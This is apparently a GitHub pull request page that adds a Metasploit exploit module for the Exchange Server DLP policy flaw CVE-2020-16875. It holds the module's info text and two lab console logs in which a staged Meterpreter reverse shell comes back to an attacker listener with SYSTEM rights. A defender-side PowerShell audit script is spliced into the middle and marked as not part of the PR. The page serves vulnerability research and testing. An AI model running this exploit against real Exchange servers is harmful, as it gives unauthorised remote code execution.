Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875) #14126

Merged
merged 6 commits into from Sep 16, 2020

Conversation


@wvu wvu commented Sep 11, 2020

Requires #14139!

Info

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > info

       Name: Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE
     Module: exploit/windows/http/exchange_ecp_dlp_policy
   Platform: Windows
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-08

Provided by:
  mr_me
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 account-lockouts
 config-changes
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Exchange Server 2016 and 2019 w/o KB4577352

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        OWA password
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  USERNAME                    no        OWA username
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This vulnerability allows remote attackers to execute arbitrary code
  on affected installations of Exchange Server. Authentication is
  required to exploit this vulnerability. Additionally, the target
  user must have the "Data Loss Prevention" role assigned and an
  active mailbox. If the user is in the "Compliance Management" or
  greater "Organization Management" role groups, then they have the
  "Data Loss Prevention" role. Since the user who installed Exchange
  is in the "Organization Management" role group, they transitively
  have the "Data Loss Prevention" role. The specific flaw exists
  within the processing of the New-DlpPolicy cmdlet. The issue results
  from the lack of proper validation of user-supplied template data
  when creating a DLP policy. An attacker can leverage this
  vulnerability to execute code in the context of SYSTEM. Tested
  against Exchange Server 2016 CU14 on Windows Server 2016.

References:
  https://cvedetails.com/cve/CVE-2020-16875/
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875
  https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016
  https://srcincite.io/advisories/src-2020-0019/
  https://srcincite.io/pocs/cve-2020-16875.py.txt
  https://srcincite.io/pocs/cve-2020-16875.ps1.txt

msf6 exploit(windows/http/exchange_ecp_dlp_policy) >

Exploit

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.123.192/owa/
[*] Logging in to OWA with creds Administrator:Passw0rd!
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abbotstone Agricultural Property Unit Trust Data
[*] Powershell command length: 2372
[*] https://192.168.123.1:8443 handling request from 192.168.123.192; (UUID: rwlz4ahe) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.192:6951) at 2020-09-16 02:39:17 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-365Q2VJJS17
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter >
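
The module description above says the vulnerable New-DlpPolicy path is reachable by any account holding the "Data Loss Prevention" role (directly, or transitively via the Compliance Management and Organization Management role groups) and that a successful run leaves a new DLP policy behind (the "config-changes" side effect). The following defender-side audit is an added example for the Exchange Management Shell, not code from this PR or the module; the cmdlets are standard Exchange PowerShell, while the 7-day window and the selected column names are assumptions.

```powershell
# Added example: audit exposure to CVE-2020-16875 on an Exchange 2016/2019 server.
# Not part of the PR or the Metasploit module. Run from the Exchange Management Shell.
# Assumptions: cmdlet and property names are the standard Exchange ones; the
# 7-day lookback is an arbitrary, constructed threshold.

# 1. Who can reach the vulnerable cmdlet path? Every effective holder of the
#    "Data Loss Prevention" role, whether assigned directly or through a role group.
Write-Host "Effective holders of the 'Data Loss Prevention' role:"
Get-ManagementRoleAssignment -Role "Data Loss Prevention" -GetEffectiveUsers |
    Select-Object -ExpandProperty EffectiveUserName |
    Sort-Object -Unique

# 2. The two role groups named in the module description; any member of either
#    inherits the role (the installing account sits in Organization Management).
foreach ($group in @("Organization Management", "Compliance Management")) {
    Write-Host "`nMembers of role group '$group':"
    Get-RoleGroupMember -Identity $group | Select-Object Name, RecipientType
}

# 3. "config-changes" side effect: exploitation creates a DLP policy from the
#    attacker's template. Surface recently created policies for manual review.
#    (WhenCreated on the policy object is assumed to be populated as for other
#    Exchange configuration objects.)
$since = (Get-Date).AddDays(-7)
Write-Host "`nDLP policies created since ${since}:"
Get-DlpPolicy | Where-Object { $_.WhenCreated -ge $since } |
    Select-Object Name, State, Mode, WhenCreated

# 4. Patch state: the fix is KB4577352 (see the module's References). Exchange
#    security updates are not reliably listed by Get-HotFix, so report the
#    Exchange build and compare it with the KB article's fixed build numbers.
Write-Host "`nExchange server builds (compare against KB4577352):"
Get-ExchangeServer | Select-Object Name, AdminDisplayVersion
```

Any account listed in step 1 that does not need to manage DLP policies is a candidate for role removal, and any policy from step 3 that nobody recognises should be exported and examined before it is deleted.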

@wvu wvu added the module, blocked (Blocked by one or more additional tasks) and a2k19 (Hackathon 2019 in Austin) labels Sep 11, 2020
@wvu wvu marked this pull request as draft September 11, 2020 20:18
@wvu wvu added the feature label and removed the a2k19 (Hackathon 2019 in Austin) label Sep 11, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Sep 11, 2020
@wvu wvu changed the title from "[PLACEHOLDER] Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875)" to "[WIP] Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875)" Sep 15, 2020
@wvu wvu added the needs-docs label Sep 15, 2020

label-actions bot commented Sep 15, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@wvu wvu force-pushed the feature/exchange branch 6 times, most recently from f48ef06 to 9d0a9c8 September 16, 2020 06:34
@wvu wvu removed the needs-docs label Sep 16, 2020
@wvu wvu changed the title from "[WIP] Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875)" to "Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875)" Sep 16, 2020
@wvu wvu removed the blocked (Blocked by one or more additional tasks) label Sep 16, 2020
@wvu wvu marked this pull request as ready for review September 16, 2020 07:14

@smcintyre-r7 smcintyre-r7 left a comment


Tested successfully from a combined branch of 14126 + 14139

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run

[*] Started reverse TCP handler on 192.168.159.128:8443 
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.159.53/owa/
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abn Amro Hoare Govett Limited Data
[*] Powershell command length: 2092
[*] Sending stage (200262 bytes) to 192.168.159.53
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.53:6911) at 2020-09-16 12:32:55 -0400


meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-GD5KVDKUNIP
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter >

@smcintyre-r7

Retested this just now with the latest changes that addressed my comments and everything is still working so I'm going to go ahead and get this landed momentarily.

@smcintyre-r7 smcintyre-r7 merged commit c2d101a into rapid7:master Sep 16, 2020

smcintyre-r7 commented Sep 16, 2020

Release Notes

New module exploits/windows/http/exchange_ecp_dlp_policy adds an authenticated RCE exploit for Microsoft Exchange which leverages the flaw identified as CVE-2020-16875 to inject code when processing a new DLP policy. The user must have the "Data Loss Prevention" role assigned in order to exploit this vulnerability.

@wvu wvu deleted the feature/exchange branch September 16, 2020 20:42
@pbarry-r7 pbarry-r7 added the rn-modules (release notes for new or majorly enhanced modules) label Sep 29, 2020
@wvu wvu added the docs label Nov 11, 2020